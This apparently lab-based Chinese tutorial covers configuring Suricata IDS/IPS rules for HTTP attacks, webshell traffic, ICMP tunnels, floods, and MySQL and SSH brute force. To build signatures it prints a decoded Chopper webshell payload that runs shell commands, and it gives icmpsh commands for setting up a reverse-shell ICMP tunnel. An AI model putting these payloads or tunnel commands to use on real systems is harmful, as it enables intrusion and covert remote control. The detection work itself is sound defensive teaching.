声明

好好学习,天天向上
好好跟着蜗牛学苑的邓强老师学习技术原理

官网

前身是Snort,已开源
https://suricata.io/
https://suricata.readthedocs.io/en/latest/quickstart.html
中文文档
https://www.osgeo.cn/suricata/

安装

windows下也可以安装,这里先用linux的

基础
yum -y install gcc libpcap-devel pcre-devel libyaml-devel file-devel  zlib-devel jansson-devel nss-devel libcap-ng-devel libnet-devel tar make libnetfilter_queue-devel lua-devel PyYAML libmaxminddb-devel rustc cargo lz4-devel

配置源
yum install epel-release yum-plugin-copr
yum copr enable @oisf/suricata-6.0
安装
yum install suricata
  
systemctl status suricata
systemctl start suricata
systemctl status suricata

或者官网有离线的包

安装完后,启动
systemctl status wazuh-manager

介绍

主程序目录
/usr/sbin/suricata

核心配置(suricata.yaml)
/etc/suricata

日志
/var/log/suricata
eve.json:json格式的预警信息(类似wazuh的alert.json)
fast.log:预警核心文件,只用于非结构化存储预警信息(类似wazuh的alert.log)
stats.log:Suricata的统计信息
suricata.log:程序运行日志
suricata -v
suricata -h

初步感知

为了便于调试,先不用后台启动,使用控制台启动

-c指定配置,-s执行规则,-i指定网卡

suricata -c /etc/suricata/suricata.yaml -s signatures.rules -i ens33
suricata -c /etc/suricata/suricata.yaml -i ens33

rules下是默认的规则

改suricata的配置文件/etc/suricata/suricata.yaml

可以看到这里定义了很多变量我们都可以用

eve如何导入镜像_suricata

改这两个变量

eve如何导入镜像_HTTP_02

这里可以看到加载规则,默认是没有suricata.rules的,所以第一次运行会报错

eve如何导入镜像_eve如何导入镜像_03

我们在rules文件夹下创建/etc/suricata/rules/suricata.rules,如果没有这个启动suricata的时候会报错

# alert代表触发了就预警,还有drop、reject、pass
# http为协议,suricata支持tcp,udp,http等常见协议
# any(源IP) any(源端口) ->代表源请求目的 <>请求+响应() $HOME_NET(目标IP) any(目标端口)
# 圆括号里面代表规则匹配,msg为预警信息详细描述
# content表示过滤条件,变量http_stat_code为404
# sid是自定义规则id
# rev规定的修订版本,默认为0


alert http any any <> $HOME_NET any (msg: "Web服务器出现404状态码"; content: "404"; http_stat_code; sid: 561001; )

eve如何导入镜像_NIDS_04

启动web服务

启动suricata

cd /etc/suricata
suricata -c suricata.yaml -i ens33

查看预警日志

tail -f fast.log

访问一个404的

eve如何导入镜像_网络安全_05

看到了suricata的预警

eve如何导入镜像_eve如何导入镜像_06

suricata命令

suricata
-c:指定配置文件
-i:指定网卡
-T:测试配置文件
-v:设置日志级别
-D:后台启动
-l:临时设置日志输出目录(/etc/suricata/suricata.yaml中的default-log-dir)
-s:临时添加新规则(/etc/suricata/suricata.yaml中的default-rule-path和rule-files)

离线分析

wireshark抓取导出一个.pcap后缀包,由于现在suricata只写了一条404规则,我就抓取虚拟机的网卡,访问一个404导出

suricata -c /etc/suricata/suricata.yaml -r ./xampp.pcap -l /tmp/

eve如何导入镜像_HTTP_07

eve如何导入镜像_HTTP_08

离线分析,可以很快捷的对规则进行测试

也可以将suricata的监控过程保存在pcap中,使用wireshark打开进行解析

定级

打开/etc/suricata/classification.config

# HTTP Protocol
config classification: http-status-404, Web服务器出现404, 4
config classification: web-url-scan, 疑似出现url爬虫扫描,2

eve如何导入镜像_eve如何导入镜像_09

修改规则/etc/suricata/rules/suricata.rules

alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器出现404状态码"; content: "404"; http_stat_code; sid: 561002; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器出现404状态码"; content: "404"; http_stat_code; classtype: http-status-404; sid: 561003; )

重启suricata,访问404,出现了定级为4级的

eve如何导入镜像_网络安全_10

字段解析匹配

payload关键字

https://suricata.readthedocs.io/en/latest/rules/payload-keywords.html
content
所有的大小写、特殊字符,针对一些特殊符号或者中文需要使用十六进制,写法 |3A|表示冒号("的ASCII码")。|0D|为\r,|0A|为\n,
默认情况下,content为非正则的包含运算(模糊匹配)
也可以用字段进行匹配,比如http_stat_code,http_url等
也可以使用startwith、endwith进行精确匹配

nocase
不区分大小写,通常放在content后面\

dsize
数据包有效载荷的大小(大于、小于、等于)
dsize: 100,表示大于等于100
dsize: <100、dsize: 100<>200

pcre
正则,使用//包裹表达式,最后的位置可以设置选项(例如i不区分大小写等等)
通常,pcre不能直接单独存在,必须依赖content,使用了content模糊匹配,再用pcre精准匹配

depth
深度
例如,depth: 3,取3个

转码关键字

to_md5
对字段内容md5转码后再和content匹配

base64_code
对字段内容base64解码后再和content匹配

Flow关键字

有点类似上下文的感觉,第一条匹配上了,加个字段,第二条根据上下文动态添加的这个字段再进行匹配

flow
流向
to_server客户端向服务器
to_client服务器向客户端

flowint
统计数量,同一个特征累计多少条就告警

禁用之前的规则后,编写规则,使用flowint

第一条,匹配404,如果urlcount没有设置,设置为为1,不告警

第二条,如果设置了,+1,不告警

第三条,如果大于等于5了,告警

#404到达阈值后预警-1
# flowint:urlcount定义变量urlcount,当404出现第一次urlcount为1,往后自增1,超过5把第三条告警出来,前两条不进行告警
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器出现404状态码"; content: "404"; http_stat_code; flowint:urlcount, notset; flowint:urlcount, =, 1; noalert; sid: 561004; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器出现404状态码"; content: "404"; http_stat_code; flowint:urlcount, isset; flowint:urlcount, +, 1; noalert; sid: 561005; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器频繁404状态码"; content: "404"; http_stat_code; flowint:urlcount, >=, 5; priority: 2; sid: 561006; rev: 2; )

阈值关键字

threshold
阈值,默认建议用threshold,如果设置为limit,则会限制警告的数量

track
by_src跟踪源(优先考虑)
by_dst
by_rule
by_both

时间和次数
count <N>, seconds <T>,T秒内出现N次

禁用之前的规则后,编写规则,使用threshold

当匹配到了404的时候,同一个ip,20秒内触发了5次,就告警出来

alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器频繁404状态码"; content: "404"; http_stat_code; threshold: type threshold, track by_src, count 5, seconds 20; classtype: web-url-scan; sid: 561007; rev: 3; )

HTTP攻击

定级

编辑/etc/suricata/classification.config,对常见HTTP攻击进行定级

# 用户自定义
config classification: http-status-error, Web服务器状态异常, 4
config classification: web-scan-attack, Web页面扫描攻击, 2
config classification: web-sql-injection, SQL注入攻击, 1
config classification: web-xss-attack, XSS攻击, 2
config classification: web-ssrf-attack, SSRF请求伪造攻击, 2
config classification: web-shell-attack, 站点木马植入, 1
config classification: web-file-upload, 文件上传异常, 2
config classification: web-other-alert, 服务器潜在风险, 2

状态码检测

编写规则/etc/suricata/rules/suricata.rules

加入400、404和500的异常,频繁出现404的,就满足我们的分级web-scan-attack

alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器400"; content: "400"; http_stat_code; classtype: http-status-error; sid: 600001; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器404"; content: "404"; http_stat_code; classtype: http-status-error; sid: 600002; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "Web服务器500"; content: "500"; http_stat_code; classtype: http-status-error; sid: 600003; rev: 1; )

alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "频繁404,疑似扫描"; content: "404"; http_stat_code; threshold: type threshold, track by_src, count 5, seconds 10; classtype: web-scan-attack; sid: 601001; rev: 1; )

SQL注入

编写规则/etc/suricata/rules/suricata.rules

对uri进行匹配,黑名单有select、单引号、–、

611003先匹配到了–,然后在匹配一次或多次的+或者空格

611004抓取POST请求,标准POST请求的特征有content_type字段,并且为x-www-form-urlencoded

611005将多个正则写在一起,虽然一条就解决,但是效率会比一条条分开写低,而且不知道触发了哪个具体规则。http.request_body只会匹配请求的正文,http.response_body只会匹配响应的正文

#SQL注入攻击-URI关键字
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SQL注入攻击-select"; content: "select"; http_uri; classtype: web-sql-injection; sid: 611000; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SQL注入攻击-单引号"; content: "|27|"; http_uri; classtype: web-sql-injection; sid: 611001; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SQL注入攻击-双引号"; content: "|22|"; http_uri; classtype: web-sql-injection; sid: 611002; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SQL注入攻击-SQL注释"; content: "--"; http_uri; pcre: "/\+*|\s*/i"; classtype: web-sql-injection; sid: 611003; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SQL注入攻击POST-SQL注释"; content: "="; http.request_body; pcre: "/\+*|\s*/i"; http.content_type; content: "x-www-form-urlencoded"; classtype: web-sql-injection; sid: 611004; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SQL注入攻击-select|union|from"; content: "/"; http_uri; pcre: "/select|union|from|%20and%20/i"; classtype: web-sql-injection; sid: 611005; rev: 1; )

XSS

URL里面包含下面规则content中的都会触发

#XSS攻击
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "XSS-<script"; content: "<script"; http_uri; nocase; classtype: web-xss-attack; sid: 620001; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "XSS-</script"; content: "</script"; http_uri; nocase; classtype: web-xss-attack; sid: 620002; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "XSS-javascript"; content: "javascript"; http_uri; nocase; classtype: web-xss-attack; sid: 620003; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "XSS-alert"; content: "alert"; http_uri; nocase; classtype: web-xss-attack; sid: 620004; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "XSS-onload="; content: "onload="; http_uri; nocase; classtype: web-xss-attack; sid: 620005; rev: 1; )

SSRF

URL里面包含下面规则content中的都会触发

#SSRF攻击
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SSRF-file:"; content: "file|3A|"; http_uri; nocase; classtype: web-ssrf-attack; sid: 630001; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SSRF-http:"; content: "http|3A|"; http_uri; nocase; classtype: web-ssrf-attack; sid: 630002; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SSRF-https:"; content: "https|3A|"; http_uri; nocase; classtype: web-ssrf-attack; sid: 630003; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SSRF-dict:"; content: "dict|3A|"; http_uri; nocase; classtype: web-ssrf-attack; sid: 630004; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SSRF-gopher:"; content: "gopher|3A|"; http_uri; nocase; classtype: web-ssrf-attack; sid: 630005; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SSRF-phar:"; content: "phar|3A|"; http_uri; nocase; classtype: web-ssrf-attack; sid: 630006; rev: 1; )

登录爆破

20秒内一直在访问登录页面

#登录爆破
alert http $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg: "Web登录爆破"; content: "login.php"; http_uri; threshold: type threshold, track by_src, count 3, seconds 20; sid: 111111; )
alert http $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg: "Web登录爆破"; content: "login.html"; http_uri; threshold: type threshold, track by_src, count 3, seconds 20; sid: 111112; )

上传文件

eve如何导入镜像_suricata_11

特征:

1、上传本身就是POST

2、content_type字段为multipart/form-data; boundary

3、正文存在Content-Disposition

#文件上传
alert http $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "文件正常上传"; filestore; classtype: web-file-upload; sid: 614000; rev: 1; )
alert http $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "文件正常上传"; http.method; content: "POST"; http.content_type; content: "multipart/form-data"; http.request_body; content: "Content-Disposition"; filestore; classtype: web-file-upload; sid: 614001; rev: 1; )
alert http $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "PHP木马上传"; content: "<?"; http.content_type; content: "multipart/form-data"; http.request_body; pcre: "/eval|assert|system\(exec|$_POST|$_GET\)/i"; filestore; classtype: web-file-upload; sid: 614002; rev: 1; )
#drop http $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "木马上传"; content: "<?"; http.content_type; content: "multipart/form-data"; http.request_body; pcre: "/eval|assert|system\(exec|$_POST|$_GET\)/i"; filestore; classtype: web-file-upload; sid: 614003; rev: 1; )

记得定义VAUDIT_PORTS变量

规则中关键字filestore是为了保存用户上传的文件,保存的配置在/etc/suricata/suricata.yaml的file-store节点,改为yes

eve如何导入镜像_eve如何导入镜像_12

文件会保存在/var/log/suricata/filestore

会把文件的SHA256前两位作为文件名

eve如何导入镜像_HTTP_13

在eve.json中查找规则sid,根据sid可以查看到文件SHA256后的名称

tail -f eve.json | grep 614002

tail -f eve.json | grep 614002

菜刀流量分析

启动菜刀连接提前准备好的webshell

eve如何导入镜像_suricata_14

抓个菜刀的包

eve如何导入镜像_eve如何导入镜像_15

虚拟终端输入ifconfig抓包

eve如何导入镜像_eve如何导入镜像_16

对比看到响应内容里面有X@Y

请求里面有一个a参数,内容为base64编码的一段

a=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JG09Z2V0X21hZ2ljX3F1b3Rlc19ncGMoKTskcD0nL2Jpbi9zaCc7JHM9J2NkIC9vcHQvbGFtcHAvaHRkb2NzL3ZhdWRpdC87aWZjb25maWc7ZWNobyBbU107cHdkO2VjaG8gW0VdJzskZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JGM9c3Vic3RyKCRkLDAsMSk9PSIvIj8iLWMgXCJ7JHN9XCIiOiIvYyBcInskc31cIiI7JHI9InskcH0geyRjfSI7JGFycmF5PWFycmF5KGFycmF5KCJwaXBlIiwiciIpLGFycmF5KCJwaXBlIiwidyIpLGFycmF5KCJwaXBlIiwidyIpKTskZnA9cHJvY19vcGVuKCRyLiIgMj4mMSIsJGFycmF5LCRwaXBlcyk7JHJldD1zdHJlYW1fZ2V0X2NvbnRlbnRzKCRwaXBlc1sxXSk7cHJvY19jbG9zZSgkZnApO3ByaW50ICRyZXQ7O2VjaG8oIlhAWSIpO2RpZSgpOw

base解码后为,这里面当然也包含我们要执行的ifconfig命令请求头里也看到了X@Y

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /opt/lampp/htdocs/vaudit/;ifconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();

综上所述,菜刀流量特征

1、响应体,存在X@Y,并且以X@Y开始,以X@Y结束

X、@、Y的ASCII码分别为88、64、89,转成16进制为58、40、59

2、请求体,包含array_map,按照1方式进行转化为16进制的|61 72 72 61 79 5f 6d 61 70|,并且请求还包含array(“ev”."Al这个用正则可以匹配

3、试了很多次,请求体中的base64前面部分"QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZih"总是不会改变

#菜刀
alert http $EXTERNAL_NET any <> $HOME_NET $VAUDIT_PORTS (msg: "菜刀连接-响应"; http.response_body; content: "|58 40 59|"; startswith; content: "|58 40 59|"; endswith; sid: 614011; rev: 1; )
alert http $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "菜刀连接-请求"; content: "|61 72 72 61 79 5f 6d 61 70|"; http_client_body; pcre: "/array.+ev.+Al/i"; sid: 614012; rev: 1; )
alert http $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "菜刀连接-base64"; content: "QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZih"; http_client_body; sid: 614013; rev: 1; )

eve如何导入镜像_eve如何导入镜像_17

冰蝎流量分析

准备冰蝎Beta v3.0连接

eve如何导入镜像_HTTP_18

抓包,都是加密的

eve如何导入镜像_eve如何导入镜像_19

冰蝎默认的user-agent这个好像有点特征

eve如何导入镜像_eve如何导入镜像_20

但是冰蝎这里是可以改的,稍微懂点的,肯定会改一个很正常的user-agent,所以这个只能算一个弱特征,前提是遇见比较懒的攻击者

eve如何导入镜像_网络安全_21

仔细观察发现,还有一个弱特征,就是请求头“有点长”

eve如何导入镜像_eve如何导入镜像_22

响应好像也不短

eve如何导入镜像_NIDS_23

如果都是加密的,好像也不存在key=value这种特征,正常的POST请求一般应该都会跟上参数吧,而这种只有一串密文,其他啥都没

看了下冰蝎源码,是对整个POST请求体进行base64解码执行的命令,那么请求的时候就应该是对整个POST请求体进行base64编码后传输的

eve如何导入镜像_NIDS_24

将整个POST请求体复制到base64解码,虽然解开是乱码密文,但是确实是可以解开的

eve如何导入镜像_网络安全_25

eve如何导入镜像_NIDS_26

综上所述,冰蝎特征为:

1、http.user_agent为Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)

2、长度巨长

3、不存在key=value的格式,转成规则也就是前100位不存在等号=

4、POST请求体和响应体的正文都为base64编码,注意base64只有末尾补长度的时候才用=,所以不会影响到3,正则为^[大小写字母|数字|+|/]{1000,}=*$,至少有1000个大小写字母数字+/,并且以0个或多个=结尾

#冰蝎
alert http $EXTERNAL_NET any <> $HOME_NET $VAUDIT_PORTS (msg: "冰蝎连接-user_agent"; content: "Baiduspider"; http_user_agent; sid: 614020; rev: 1; )
alert tcp $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "疑似冰蝎流量-长度"; dsize: >1000; sid: 614021; rev: 1; )
alert http $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "冰蝎连接-POST前100无等于号"; http.request_body; content: !"="; depth: 100; sid: 614022; rev: 1; )
alert http $EXTERNAL_NET any -> $HOME_NET $VAUDIT_PORTS (msg: "冰蝎连接-POST请求正文为base64"; http.request_body; pcre: "/^[A-Za-z0-9\+\/]{1000,}=*$/"; sid: 614023; rev: 1; )
alert http $EXTERNAL_NET any <> $HOME_NET $VAUDIT_PORTS (msg: "冰蝎连接-POST响应正文为base64"; http.response_body; pcre: "/^[A-Za-z0-9\+\/]{1000,}=*$/"; sid: 614024; rev: 1; )

eve如何导入镜像_suricata_27

ICMP流量分析

ICMP隧道的好处:一般防御的时候,基本都是封禁端口,或者开放端口白名单,ICMP是一个很容易忽略的协议,ICMP很少会进行封禁,因为经常用语判断网络是否联通,所以如果其他的隧道无法使用,就可以考虑考虑ICMP的隧道

正常的ping流量

eve如何导入镜像_HTTP_28

windows下请求

Type为8,Code为0,Data是32字节的,是字母a开始往后

eve如何导入镜像_HTTP_29

windows下响应

Type为0,Code为0

Data和请求的Data一模一样

eve如何导入镜像_NIDS_30

Linux下请求

eve如何导入镜像_suricata_31

Linux下响应

eve如何导入镜像_HTTP_32

linux和windows下基本差不多,除了Data变成了48字节

所以使用ping测试网络联通的话,正常请求和响应的Data是一样的,而且长度、发包的频率都很小,icmp泛洪或者icmp隧道不符合正常icmp的特征

icmp泛洪

增加长度后,Data就变了

ping 192.168.174.5 -l 1000

eve如何导入镜像_suricata_33

如果再linux下加了-f,频率就更快了,这不符合正常icmp的使用

ping 192.168.174.5 -l 1000 -f

eve如何导入镜像_HTTP_34

基于此我们加入规则

alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg: "ICMP 5s10次,每次超过48,疑似ICMP泛洪"; dsize: >48; threshold: type threshold, track by_src, count 10, seconds 5; sid: 620000; rev: 1; )

再次暴力ping,触发

eve如何导入镜像_suricata_35

icmp隧道

icmpsh下载

git clone https://github.com/inquisb/icmpsh.git

kali配置,执行监听

icmpsh目前只支持python2,kali自带的python版本为python3,所以kali需要安装python2后才能运行icmpsh,安装python2后,安装icmpsh依赖包
pip2 install impacket

关闭本机的icmp应答,防止内核对自己的ping包响应
sysctl -w net.ipv4.icmp_echo_ignore_all=1

第一个IP是本机的IP,也就是kali的IP,第二个IP是远程受控端的Ip
python2 icmpsh_m.py 192.168.174.129 192.168.174.11

eve如何导入镜像_suricata_36

再找一台windows,icmpsh的受控端只能是windows,执行,IP为kali的的使用IP

icmpsh.exe -t 192.168.174.129

eve如何导入镜像_eve如何导入镜像_37

如果kali反弹的shell是乱码,可以执行这个解决

chcp 65001

eve如何导入镜像_HTTP_38

观察包

长度都是不一样的,有42的,有60的,还有我们执行whoami的106的

eve如何导入镜像_eve如何导入镜像_39

再发个ipconfig,发现,这个隧道正常只会请求长度为60,响应长度为40,我们只要执行了命令,命令的结果就会以106字节为一个包,分了几个发几个

eve如何导入镜像_suricata_40

根据此特征,只要长度为106,就疑似是ICMP隧道建立

alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg: "疑似建立ICMP隧道"; dsize: 106; sid: 620001; rev: 1; )

实验结束,将参数回退

sysctl -w net.ipv4.icmp_echo_ignore_all=0

TCP流量分析

使用hping3

【注意:suricata的规则阈值设置需要注意,很多tcp泛洪都是可以伪造源IP,suricata的阈值检测是检测同一个IP】

TCP泛洪

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg: "TCP泛洪"; flow: established, to_server; threshold: type threshold, track by_src, count 5, seconds 10; sid: 621000; rev: 1; )

SYN泛洪

alert tcp $EXTERNAL_NET 10000 -> $HOME_NET 0:1023 (msg: "SYN泛洪"; flags:S; flow: to_server; dsize:>100; threshold: type both, count 5, seconds 10, track by_src; sid: 621001; rev: 1; )

mysql

mysql的包也简单,基于tcp,明文传输

eve如何导入镜像_网络安全_41

登录失败的特征也很明显

eve如何导入镜像_HTTP_42

加一个MYSQL_PORTS变量,值为3306,由于suricata不支持mysql协议,我们就用tcp,反正mysql也是基于tcp的

630000,匹配登录失败的关键字Access denied for user

630001,在630000的基础上加上了10秒内触发3次

630002,把匹配条件写成16进制的,这个16进制的内容在wireshark也能看到

630005,先匹配内容有into outfile,再精确匹配,有写马的特征

#MYSQL
alert tcp $EXTERNAL_NET any <> $HOME_NET $MYSQL_PORTS (msg: "MYSQL登录失败-直接匹配"; content: "Access denied for user"; nocase; sid: 630000; rev: 1; )
alert tcp $EXTERNAL_NET any <> $HOME_NET $MYSQL_PORTS (msg: "MYSQL登录失败-直接匹配-10s失败3次"; content: "Access denied for user"; nocase; threshold: type threshold, track by_src, count 3, seconds 10; sid: 630001; rev: 1; )
alert tcp $EXTERNAL_NET any <> $HOME_NET $MYSQL_PORTS (msg: "MYSQL登录失败-16进制匹配"; content: "|41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72|"; nocase; sid: 630002; rev: 1; )
alert tcp $EXTERNAL_NET any <> $HOME_NET $MYSQL_PORTS (msg: "MYSQL登录失败-直接匹配-10s失败3次"; content: "|41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72|"; nocase; threshold: type threshold, track by_src, count 3, seconds 10; sid: 630003; rev: 1; )
drop tcp $EXTERNAL_NET any <> $HOME_NET $MYSQL_PORTS (msg: "MYSQL登录失败-直接匹配-10s失败5次"; content: "|41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72|"; nocase; threshold: type threshold, track by_src, count 3, seconds 10; sid: 630004; rev: 1; )
#MYSQL写入木马
alert tcp $EXTERNAL_NET any -> $HOME_NET $MYSQL_PORTS (msg: "MYSQL写入木马"; content: "into outfile"; nocase; pcre: "/system|eval|assert|$_GET|$_POST/i"; sid: 630005; rev: 1; )

登录失败测试

mysql -uroot -h 192.168.174.5 -p

eve如何导入镜像_网络安全_43

SSH

ssh协议特征,众所周知,ssh是基于Diffie-Hellman进行的秘钥分发,所以我们在ssh登录的时候可以看到密钥交换,创建秘钥的这种包

eve如何导入镜像_NIDS_44

对比多次登录成功与失败的包发现,不管成功还是失败,New Keys这个包都会发,并且包含15 00 00 00 00 00 00 00 00 00 00这个关键字,那么如果经常出现这个,就认为是在爆破了

eve如何导入镜像_HTTP_45

#SSH登录失败
alert ssh $EXTERNAL_NET any <> $HOME_NET $SSH_PORTS (msg: "SSH登录"; content: "|15 00 00 00 00 00 00 00 00 00 00|"; nocase; sid: 640000; rev: 1; )
alert ssh $EXTERNAL_NET any <> $HOME_NET $SSH_PORTS (msg: "SSH爆破"; content: "|15 00 00 00 00 00 00 00 00 00 00|"; nocase; threshold: type threshold, track by_src, count 3, seconds 10; sid: 640001; rev: 1; )

HTTPS流量抓取

wireshark

原理

加入一个环境变量,让chrome基于该环境变量,把和服务器进行ssl通信的秘钥写入到这个log里面,wireshark如果可以读取这个log,不就可以抓取https流量了

正常wireshark访问https的百度之类的,wireshark是抓不到任何包的

windows增加环境变量

SSLKEYLOGFILE

值可以自定义一个日志文件

E:\soft\https_key_log\https_key.log

eve如何导入镜像_suricata_46

打开chrome随便访问一个https的网站,让先把这个https_key.log生成

然后在wireshark导入该文件

eve如何导入镜像_suricata_47

eve如何导入镜像_NIDS_48

fiddler

eve如何导入镜像_网络安全_49

eve如何导入镜像_HTTP_50

重启,可以看到HTTPS

eve如何导入镜像_网络安全_51

或者也可以导出fiddler的证书,安装到浏览器里

eve如何导入镜像_NIDS_52

桌面上生成了证书

eve如何导入镜像_网络安全_53

把这个证书导入到浏览器就好了

本机IPS

suricata依赖iptables对流量进行拦截

iptables将流量委托给suricata,iptables不做接受/拒绝等操作

安装iptables,停掉firewalld

yum install iptables iptables-services
systemctl stop firewalld
systemctl start iptables

查看suricata是否支持NFQueue

suricata --build-info | grep NFQueue

eve如何导入镜像_网络安全_54

启动suricata

cd /etc/suricata
suricata -c suricata.yaml -q 0

suricata服务器执行,将流量交给NFQUEUE也就是suricata,参数–queue-num为队列编号,不指定默认为0

一单加了下面这条,就相当于把流量都交给了队列也就是suricata,如果suricata不启动,那么所有连接都将断开!

iptables -I INPUT -j NFQUEUE --queue-num 0

eve如何导入镜像_NIDS_55

这时候啥都别干,先加一下ssh,不加的话,一会suricata不小心中断了,就得去vmware里面调了

iptables -I INPUT -p tcp --dport 22 -j ACCEPT
iptables -I OUTPUT -p tcp --sport 22 -j ACCEPT

eve如何导入镜像_suricata_56

开启web服务,这时候web服务应该是不通的,因为web流量又没有给suricata,也没有让防火墙放行,我们先把web的80端口流量托管给suricata

iptables -I INPUT -p tcp --dport 80 -j NFQUEUE
iptables -I OUTPUT -p tcp --sport 80 -j NFQUEUE

eve如何导入镜像_网络安全_57

用这两条规则进行调试

第一条是alert,第二条前面改成了drop

alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SQL注入攻击-select"; content: "select"; http_uri; classtype: web-sql-injection; sid: 611000; rev: 1; )
drop http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg: "SQL注入攻击-database()"; content: "database()"; http_uri; classtype: web-sql-injection; sid: 611006; rev: 1; )

url输入select,会产生告警

http://192.168.174.5/dashboard/?id=select

eve如何导入镜像_eve如何导入镜像_58

fiddler抓包还能看见一个304的错误

eve如何导入镜像_HTTP_59

wireshark抓包,追踪tcp流也能看到304

eve如何导入镜像_网络安全_60

试试第二条规则,访问后一直在转圈,还报了错

http://192.168.174.5/dashboard/?id=database()

eve如何导入镜像_eve如何导入镜像_61

eve如何导入镜像_NIDS_62

fiddler抓到一个504的

eve如何导入镜像_suricata_63

eve如何导入镜像_HTTP_64

追踪tcp流也是黑色的

eve如何导入镜像_eve如何导入镜像_65

说明就没给回应直接丢弃了

当然suricata也能看到这条告警

eve如何导入镜像_网络安全_66

串行IPS

想想也知道,单击是基于iptables进行drop,如果是网关的话,就要借助iptables的nat,这样就能作为中间人对流量进行处理

我们把suricata的8889,即192.168.174.5:8889转发给

web服务器的80,即192.168.174.134:80

这样suricata检测自身的8889就可以了,suricata规则保持之前本机IPS的规则

192.168.174.134开启web服务

192.168.174.5加入转发规则

systemctl restart iptables
iptables -t filter -I FORWARD -j ACCEPT
iptables -t nat -A PREROUTING -d 192.168.174.5 -p tcp --dport 8889 -j DNAT --to-destination 192.168.174.134:80
iptables -t nat -A POSTROUTING -d 192.168.174.134 -p tcp --dport 80 -j SNAT --to 192.168.174.5

接着访问

192.168.174.5:8889

eve如何导入镜像_NIDS_67

现在代理关系已经搞定,加了转发以后,流量目前直接经过了nat表,并不会走filter表

需要把转发的流量托管给NFQUEUE,也就是suricata就可以了

iptables -I FORWARD -j NFQUEUE

因为之前的规则端口为any,所以规则不用变,suricata预警日志依旧能发现8889的流量

database()的阻断

eve如何导入镜像_网络安全_68

174.134也看不到任何的database()访问的日志

eve如何导入镜像_网络安全_69

